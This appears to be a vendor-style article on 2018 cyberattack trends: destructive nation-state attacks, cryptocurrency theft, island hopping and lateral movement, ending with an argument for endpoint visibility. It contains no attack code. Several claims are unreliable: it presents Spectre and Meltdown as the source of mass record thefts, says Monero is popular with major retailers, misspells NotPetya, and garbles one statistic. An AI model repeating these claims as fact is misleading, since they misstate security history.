Setting expectations and preparing for a new breed of cyberattacks
While 2016 may have been “The Year of the Fileless Attack” and 2017 “The Year of Ransomware,” 2018 proved to be “The Year of the Next-Gen Cyberattack.”
In 2016, fileless attacks made headlines, including those of PowerWare and the alleged hack against the Democratic National Committee (DNC).
The year of 2017 fell victim to the global effects of ransomware, when WannaCry, NotPeyta and BadRabbit were discovered.
Then, in 2018, Spectre and Meltdown vulnerabilities lead the charge of high-profile, global-scale cyberattacks where billions of personal records were stolen from household names in government, technology, healthcare, travel and hospitality. More importantly, it also revealed that endpoint visibility must become a priority for the year ahead.
As we continue to reflect on the lessons of last year, it is evident that modern cyberattacks appear to be increasingly fueled by geopolitical tension, and they reveal how sophisticated attackers have evolved to remain undetected.
To better understand how the year’s attack landscape will continue to develop and why endpoint visibility will become even more critical, consider the following statistics and their future implications.
IR firms are encountering destructive attacks during 32 percent of investigations.
Most recently, multiple destructive actions have come from Iran and North Korea, where they’ve effectively wiped machines they suspect of being forensically analyzed. As nation-state cyberattackers gain power and sophistication, organizations should expect attacks to become increasingly destructive.
An estimated $1.8 billion of cryptocurrency-related thefts occurred in 2018.
Cryptocurrency exchanges are the most vulnerable target for cybercriminals. Exchanges account for over 27 percent of all reported incidents, representing prime targets for cryptocurrency theft, fraud and harvesting of user information for follow-on targeting by these same criminals.
While bitcoin is still the lead cryptocurrency for legitimate cyber transactions, cybercriminals are also utilizing alternative and more profitable currencies. Monero, for example, was made popular among major retailers and online services. It is now used in 44% of all attacks.
Island hopping primarily uses the victim for half of today’s cyberattacks.
Island hopping first targets an organization’s affiliates, often smaller companies with immature security postures. This means that not only is your data at risk, but so is the data at every point in your supply chain - including that of your customers and partners.
Counter incident response is now involved in half of incident response engagements.
As attackers become increasingly sophisticated, incident response must get stealthier. The longer-term campaigns that attackers are beginning to orchestrate, means organizations must work harder at preparing their incident response.
Nearly 60 percent of attacks now involve lateral movement.
Lateral movement is a method used by cyberattackers to move through a network, as they search for the essential data that is the eventual target of the breach. Continuing to hide in plain sight, cybercriminals are leveraging non-malware / fileless attack methods to do this, which is the biggest indicator that attackers aren’t just focused on one component of an organization, but are seeking additional targets as they infiltrate the network.
In order for today’s organizations to prepare for these threats to security, they first need to solve the problem of visibility. True endpoint visibility should allow you to “turn back the clock” and see exactly what happened on the endpoint at a specific date. To understand how significant this capability is, we found that an organization with 10,000 endpoints is estimated to see more than 660 attempted cyberattacks per day.
Yes, in 2018, cybersecurity professionals encountered an increase in cryptomining, fileless attacks, ransomware and commodity malware. But now, as attackers continue to adapt and global tensions continue to heighten, we can expect the growth of techniques such as lateral movement, island hopping and counter incident response to create a year where endpoint visibility becomes even more significant.